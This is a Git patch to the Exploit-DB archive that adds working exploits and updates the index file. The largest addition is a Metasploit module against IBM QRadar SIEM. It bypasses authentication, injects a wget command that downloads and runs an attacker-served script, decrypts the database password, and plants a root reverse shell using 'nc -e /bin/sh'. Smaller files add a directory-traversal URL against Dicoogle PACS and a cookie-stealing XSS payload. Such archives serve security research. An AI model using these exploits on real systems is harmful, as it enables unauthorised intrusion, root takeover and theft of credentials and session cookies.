From 52954b47519605a2d088e8147108f96c2c5b5659 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Thu, 12 Jul 2018 05:01:59 +0000 Subject: [PATCH] DB: 2018-07-12 5 changes to exploits/shellcodes Nibbleblog - Arbitrary File Upload (Metasploit) Nibbleblog 4.0.3 - Arbitrary File Upload (Metasploit) IBM QRadar SIEM - Unauthenticated Remote Code Execution (Metasploit) Nibbleblog - Multiple SQL Injections Nibbleblog 3 - Multiple SQL Injections Instagram-Clone Script 2.0 - Cross-Site Scripting Dicoogle PACS 2.5.0 - Directory Traversal --- exploits/hardware/local/44206.c | 2 +- exploits/linux/local/44205.md | 2 +- exploits/linux/webapps/45007.txt | 19 +++ exploits/php/webapps/45003.txt | 36 +++++ exploits/unix/remote/45005.rb | 228 +++++++++++++++++++++++++++++++ files_exploits.csv | 7 +- 6 files changed, 290 insertions(+), 4 deletions(-) create mode 100644 exploits/linux/webapps/45007.txt create mode 100644 exploits/php/webapps/45003.txt create mode 100755 exploits/unix/remote/45005.rb diff --git a/exploits/hardware/local/44206.c b/exploits/hardware/local/44206.c index 5c0a271dd..66aeae8e4 100644 --- a/exploits/hardware/local/44206.c +++ b/exploits/hardware/local/44206.c @@ -6,7 +6,7 @@ - @kr105rlz -Download: //github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44206.zip +Download: http://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44206.zip */ #include "ps4.h" diff --git a/exploits/linux/local/44205.md b/exploits/linux/local/44205.md index d62870892..9917ca7c9 100644 --- a/exploits/linux/local/44205.md +++ b/exploits/linux/local/44205.md @@ -13,4 +13,4 @@ $ make # Reference [Exploiting “BadIRET” vulnerability (CVE-2014-9322, Linux kernel privilege escalation)](https://blogs.bromium.com/exploiting-badiret-vulnerability-cve-2014-9322-linux-kernel-privilege-escalation/) -Download: //github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44205.zip \ No newline at end of file +Download: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44205.zip \ No newline at end of file diff --git a/exploits/linux/webapps/45007.txt b/exploits/linux/webapps/45007.txt new file mode 100644 index 000000000..fca439d37 --- /dev/null +++ b/exploits/linux/webapps/45007.txt @@ -0,0 +1,19 @@ +# Exploit Title: Dicoogle PACS 2.5.0 - Directory Traversal +# Date: 2018-05-25 +# Software Link: http://www.dicoogle.com/home +# Version: Dicoogle PACS 2.5.0-20171229_1522 +# Category: webapps +# Tested on: Windows 2012 R2 +# Exploit Author: Carlos Avila +# Contact: http://twitter.com/badboy_nt + +# 1. Description +# Dicoogle is an open source medical imaging repository with an extensible +# indexing system and distributed mechanisms. In version 2.5.0, it is vulnerable +# to local file inclusion. This allows an attacker to read arbitrary files that the +# web user has access to. Admin credentials aren't required. The ‘UID’ parameter +# via GET is vulnerable. + +# 2. Proof of Concept + +http://Target:8080/exportFile?UID=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini \ No newline at end of file diff --git a/exploits/php/webapps/45003.txt b/exploits/php/webapps/45003.txt new file mode 100644 index 000000000..53726641d --- /dev/null +++ b/exploits/php/webapps/45003.txt @@ -0,0 +1,36 @@ +# Exploit Title: Instagram-clone Script 2.0 - Cross-Site Scripting +# Date: 2018-07-10 +# Exploit Author: L0RD +# Vendor Homepage: https://github.com/yTakkar/Instagram-clone +# Version: 2.0 +# CVE: CVE-2018-13849 +# Tested on: Kali linux + +# POC : Persistent Cross site scripting : +# vulnerable file : edit_requests.php +# vulnerable code : + +if (isset($_POST['username'])) { + $username = preg_replace("#[<> ]#i", "", $_POST['username']); + $firstname = preg_replace("#[<> ]#i", "", $_POST['firstname']); + $surname = preg_replace("#[<> ]#i", "", $_POST['surname']); + $bio = preg_replace("#[<>]#i", "", $_POST['bio']); + $instagram = preg_replace("#[<>]#i", "", $_POST['instagram']); + $youtube = preg_replace("#[<>]#i", "", $_POST['youtube']); + $facebook = preg_replace("#[<>]#i", "", $_POST['facebook']); + $twitter = preg_replace("#[<>]#i", "", $_POST['twitter']); + $website = preg_replace("#[<>]#i", "", $_POST['website']); + $mobile = preg_replace("#[^0-9]#i", "", $_POST['mobile']); + $tags = preg_replace("#[\s]#", "-", $_POST['tags']); + $session = $_SESSION['id']; + + $m=$edit->saveProfileEditing($username, $firstname, $surname, $bio, +$instagram, $youtube, $facebook, $twitter, $website, $mobile, $tags); + $array = array("mssg" => $m); + echo json_encode($array); + } + +# We use this payload to bypass filter : +# Payload : + +"onmouseover=" alert(document.cookie) \ No newline at end of file diff --git a/exploits/unix/remote/45005.rb b/exploits/unix/remote/45005.rb new file mode 100755 index 000000000..cfaff171a --- /dev/null +++ b/exploits/unix/remote/45005.rb @@ -0,0 +1,228 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'securerandom' + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::Remote::HttpServer + include Msf::Exploit::EXE + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'IBM QRadar SIEM Unauthenticated Remote Code Execution', + 'Description' => %q{ + IBM QRadar SIEM has three vulnerabilities in the Forensics web application + that when chained together allow an attacker to achieve unauthenticated remote code execution. + + The first stage bypasses authentication by fixating session cookies. + The second stage uses those authenticated sessions cookies to write a file to disk and execute + that file as the "nobody" user. + The third and final stage occurs when the file executed as "nobody" writes an entry into the + database that causes QRadar to execute a shell script controlled by the attacker as root within + the next minute. + Details about these vulnerabilities can be found in the advisories listed in References. + + The Forensics web application is disabled in QRadar Community Edition, but the code still works, + so these vulnerabilities can be exploited in all flavours of QRadar. + This module was tested with IBM QRadar CE 7.3.0 and 7.3.1. IBM has confirmed versions up to 7.2.8 + patch 12 and 7.3.1 patch 3 are vulnerable. + Due to payload constraints, this module only runs a generic/shell_reverse_tcp payload. + }, + 'Author' => + [ + 'Pedro Ribeiro ' # Vulnerability discovery and Metasploit module + ], + 'License' => MSF_LICENSE, + 'Platform' => ['unix'], + 'Arch' => ARCH_CMD, + 'References' => + [ + ['CVE', '2016-9722'], + ['CVE', '2018-1418'], + ['CVE', '2018-1612'], + ['URL', 'https://blogs.securiteam.com/index.php/archives/3689'], + ['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/ibm-qradar-siem-forensics.txt'], + ['URL', 'http://seclists.org/fulldisclosure/2018/May/54'], + ['URL', 'http://www-01.ibm.com/support/docview.wss?uid=swg22015797'] + ], + 'Targets' => + [ + [ 'IBM QRadar SIEM <= 7.3.1 Patch 2 / 7.2.8 Patch 11', {} ], + ], + 'Payload' => { + 'Compat' => { + 'ConnectionType' => 'reverse', + } + }, + 'DefaultOptions' => { + 'SSL' => true, + # we can only run shell scripts, so set a reverse netcat payload by default + # the payload that will be run is in the first few lines of @payload + 'PAYLOAD' => 'generic/shell_reverse_tcp', + }, + 'DisclosureDate' => 'May 28 2018', + 'DefaultTarget' => 0)) + register_options( + [ + Opt::RPORT(443), + OptString.new('SRVHOST', [true, 'HTTP server address', '0.0.0.0']), + OptString.new('SRVPORT', [true, 'HTTP server port', '4448']), + ]) + end + + def check + res = send_request_cgi({ + 'uri' => '/ForensicsAnalysisServlet/', + 'method' => 'GET' + }) + + if res.nil? + vprint_error 'Connection failed' + return CheckCode::Unknown + end + + if res.code == 403 + return CheckCode::Detected + end + + CheckCode::Safe + rescue ::Rex::ConnectionError + vprint_error 'Connection failed' + return CheckCode::Unknown + end + + # Handle incoming requests from QRadar + def on_request_uri(cli, request) + print_good("#{peer} - Sending privilege escalation payload to QRadar...") + print_good("#{peer} - Sit back and relax, Shelly will come visit soon!") + send_response(cli, @payload) + end + + + # step 1 of the exploit, bypass authentication in the ForensicAnalysisServlet + def set_cookies + @sec_cookie = SecureRandom.uuid + @csrf_cookie = SecureRandom.uuid + + post_data = "#{rand_text_alpha(5..12)},#{rand_text_alpha(5..12)}," + + "#{@sec_cookie},#{@csrf_cookie}" + + res = send_request_cgi({ + 'uri' => '/ForensicsAnalysisServlet/', + 'method' => 'POST', + 'ctype' => 'application/json', + 'cookie' => "SEC=#{@sec_cookie}; QRadarCSRF=#{@csrf_cookie};", + 'vars_get' => + { + 'action' => 'setSecurityTokens', + 'forensicsManagedHostIps' => "#{rand(256)}.#{rand(256)}.#{rand(256)}.#{rand(256)}" + }, + 'data' => post_data + }) + + if res.nil? or res.code != 200 + fail_with(Failure::Unknown, "#{peer} - Failed to set the SEC and QRadar CSRF cookies") + end + end + + def exploit + print_status("#{peer} - Attempting to exploit #{target.name}") + + # run step 1 + set_cookies + + # let's prepare step 2 (payload) and 3 (payload exec as root) + @payload_name = rand_text_alpha_lower(3..5) + root_payload = rand_text_alpha_lower(3..5) + + if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::") + srv_host = Rex::Socket.source_address(rhost) + else + srv_host = datastore['SRVHOST'] + end + + http_service = (datastore['SSL'] ? 'https://' : 'http://') + srv_host + ':' + datastore['SRVPORT'].to_s + service_uri = http_service + '/' + @payload_name + + print_status("#{peer} - Starting up our web service on #{http_service} ...") + start_service({'Uri' => { + 'Proc' => Proc.new { |cli, req| + on_request_uri(cli, req) + }, + 'Path' => "/#{@payload_name}" + }}) + + @payload = %{#!/bin/bash + +# our payload that's going to be downloaded from our web server +cat < /store/configservices/staging/updates/#{root_payload} +#!/bin/bash +/usr/bin/nc -e /bin/sh #{datastore['LHOST']} #{datastore['LPORT']} & +EOF + +### below is adapted from /opt/qradar/support/changePasswd.sh +[ -z $NVA_CONF ] && NVA_CONF="/opt/qradar/conf/nva.conf" +NVACONF=`grep "^NVACONF=" $NVA_CONF 2> /dev/null | cut -d= -f2` +FRAMEWORKS_PROPERTIES_FILE="frameworks.properties" +FORENSICS_USER_FILE="config_user.xml" +FORENSICS_USER_FILE_CONFIG="$NVACONF/$FORENSICS_USER_FILE" + +# get the encrypted db password from the config +PASSWORDENCRYPTED=`cat $FORENSICS_USER_FILE_CONFIG | grep WEBUSER_DB_PASSWORD | grep -o -P '(?<=>)([\\w\\=\\+\\/]*)(?=<)'` + +QVERSION=$(/opt/qradar/bin/myver | awk -F. '{print $1$2$3}') + +AU_CRYPT=/opt/qradar/lib/Q1/auCrypto.pm +P_ENC=$(grep I_P_ENC ${AU_CRYPT} | cut -d= -f2-) +P_DEC=$(grep I_P_DEC ${AU_CRYPT} | cut -d= -f2-) + +AESKEY=`grep 'aes.key=' $NVACONF/$FRAMEWORKS_PROPERTIES_FILE | cut -c9-` + +#if 7.2.8 or greater, use new method for hashing and salting passwords +if [[ $QVERSION -gt 727 || -z "$AESKEY" ]] +then + PASSWORD=$(perl <(echo ${P_DEC} | base64 -d) <(echo ${PASSWORDENCRYPTED})) + [ $? != 0 ] && echo "ERROR: Unable to decrypt $PASSWORDENCRYPTED" && exit 255 +else + + PASSWORD=`/opt/qradar/bin/runjava.sh -Daes.key=$AESKEY com.q1labs.frameworks.crypto.AESUtil decrypt $PASSWORDENCRYPTED` + [ $? != 0 ] && echo "ERROR: Unable to decrypt $PASSWORDENCRYPTED" && exit 255 +fi + +PGPASSWORD=$PASSWORD /usr/bin/psql -h localhost -U qradar qradar -c \ +"insert into autoupdate_patch values ('#{root_payload}',#{rand(1000)+100},'minor',false,#{rand(9999)+100},0,'',1,false,'','','',false)" + +# kill ourselves! +(sleep 2 && rm -- "$0") & +} + + # let's do step 2 then, ask QRadar to download and execute our payload + print_status("#{peer} - Asking QRadar to download and execute #{service_uri}") + + exec_cmd = "$(mkdir -p /store/configservices/staging/updates && wget --no-check-certificate -O " + + "/store/configservices/staging/updates/#{@payload_name} #{service_uri} && " + + "/bin/bash /store/configservices/staging/updates/#{@payload_name})" + + payload_step2 = "pcap[0][pcap]" + + "=/#{rand_text_alpha_lower(2..6) + '/' + rand_text_alpha_lower(2..6)}" + + "&pcap[1][pcap]=#{Rex::Text::uri_encode(exec_cmd, 'hex-all')}" + + uri_step2 = "/ForensicsAnalysisServlet/?forensicsManagedHostIps" + + "=127.0.0.1/forensics/file.php%3f%26&action=get&slavefile=true" + + res = send_request_cgi({ + 'uri' => uri_step2 + '&' + payload_step2, + 'method' => 'GET', + 'cookie' => "SEC=#{@sec_cookie}; QRadarCSRF=#{@csrf_cookie};", + }) + + # now we just sit back and wait for step 2 payload to be downloaded and executed + # ... and then step 3 to complete. Let's give it a little more than a minute. + Rex.sleep 80 + end +end \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 34e62982a..fa99ce043 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -15940,7 +15940,7 @@ id,file,description,date,author,type,platform,port 38453,exploits/hardware/remote/38453.txt,"ZHONE < S3.0.501 - Multiple Vulnerabilities",2015-10-13,"Lyon Yang",remote,hardware, 38464,exploits/hardware/remote/38464.txt,"Cisco Linksys EA2700 Router - Multiple Vulnerabilities",2013-04-15,"Phil Purviance",remote,hardware, 38481,exploits/hardware/remote/38481.html,"D-Link DIR-865L - Cross-Site Request Forgery",2013-04-19,"Jacob Holcomb",remote,hardware, -38489,exploits/php/remote/38489.rb,"Nibbleblog - Arbitrary File Upload (Metasploit)",2015-10-19,Metasploit,remote,php, +38489,exploits/php/remote/38489.rb,"Nibbleblog 4.0.3 - Arbitrary File Upload (Metasploit)",2015-10-19,Metasploit,remote,php, 38492,exploits/hardware/remote/38492.html,"TP-Link TL-WR1043N Router - Cross-Site Request Forgery",2013-04-24,"Jacob Holcomb",remote,hardware, 38495,exploits/hardware/remote/38495.html,"Belkin F5D8236-4 Router - Cross-Site Request Forgery",2013-04-25,"Jacob Holcomb",remote,hardware, 38500,exploits/windows/remote/38500.php,"HTML Compiler - Remote Code Execution",2015-10-20,"Ehsan Noreddini",remote,windows, @@ -16607,6 +16607,7 @@ id,file,description,date,author,type,platform,port 44993,exploits/php/remote/44993.rb,"GitList 0.6.0 - Argument Injection (Metasploit)",2018-07-09,Metasploit,remote,php, 45000,exploits/linux_x86-64/remote/45000.c,"OpenSSH < 6.6 SFTP (x64) - Command Execution",2014-10-08,"Jann Horn",remote,linux_x86-64, 45001,exploits/linux/remote/45001.py,"OpenSSH < 6.6 SFTP - Command Execution",2018-03-20,SECFORCE,remote,linux, +45005,exploits/unix/remote/45005.rb,"IBM QRadar SIEM - Unauthenticated Remote Code Execution (Metasploit)",2018-07-11,Metasploit,remote,unix,443 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, @@ -35166,7 +35167,7 @@ id,file,description,date,author,type,platform,port 35861,exploits/php/webapps/35861.txt,"vBTube 1.2.9 - 'vBTube.php' Multiple Cross-Site Scripting Vulnerabilities",2011-06-14,Mr.ThieF,webapps,php, 35862,exploits/php/webapps/35862.txt,"miniblog 1.0 - Multiple Cross-Site Scripting Vulnerabilities",2011-06-15,"High-Tech Bridge SA",webapps,php, 35863,exploits/php/webapps/35863.php,"MyBloggie 2.1.6 - HTML Injection / SQL Injection",2011-06-15,"Robin Verton",webapps,php, -35865,exploits/php/webapps/35865.txt,"Nibbleblog - Multiple SQL Injections",2011-06-19,KedAns-Dz,webapps,php, +35865,exploits/php/webapps/35865.txt,"Nibbleblog 3 - Multiple SQL Injections",2011-06-19,KedAns-Dz,webapps,php, 35866,exploits/php/webapps/35866.txt,"Immophp 1.1.1 - Cross-Site Scripting / SQL Injection",2011-06-18,KedAns-Dz,webapps,php, 35867,exploits/php/webapps/35867.txt,"Taha Portal 3.2 - 'sitemap.php' Cross-Site Scripting",2011-06-18,Bl4ck.Viper,webapps,php, 35871,exploits/php/webapps/35871.txt,"Sitemagic CMS 2010.04.17 - 'SMExt' Cross-Site Scripting",2011-06-21,"Gjoko Krstic",webapps,php, @@ -39642,3 +39643,5 @@ id,file,description,date,author,type,platform,port 44998,exploits/multiple/webapps/44998.py,"Oracle WebLogic 12.1.2.0 - RMI Registry UnicastRef Object Java Deserialization Remote Code Execution",2018-07-07,bobsecq,webapps,multiple, 44999,exploits/linux/webapps/44999.txt,"Elektronischer Leitz-Ordner 10 - SQL Injection",2018-07-10,"Jens Regel",webapps,linux, 45002,exploits/hardware/webapps/45002.py,"D-Link DIR601 2.02 - Credential Disclosure",2018-07-10,"Thomas Zuk",webapps,hardware, +45003,exploits/php/webapps/45003.txt,"Instagram-Clone Script 2.0 - Cross-Site Scripting",2018-07-11,L0RD,webapps,php, +45007,exploits/linux/webapps/45007.txt,"Dicoogle PACS 2.5.0 - Directory Traversal",2018-07-11,"Carlos Avila",webapps,linux,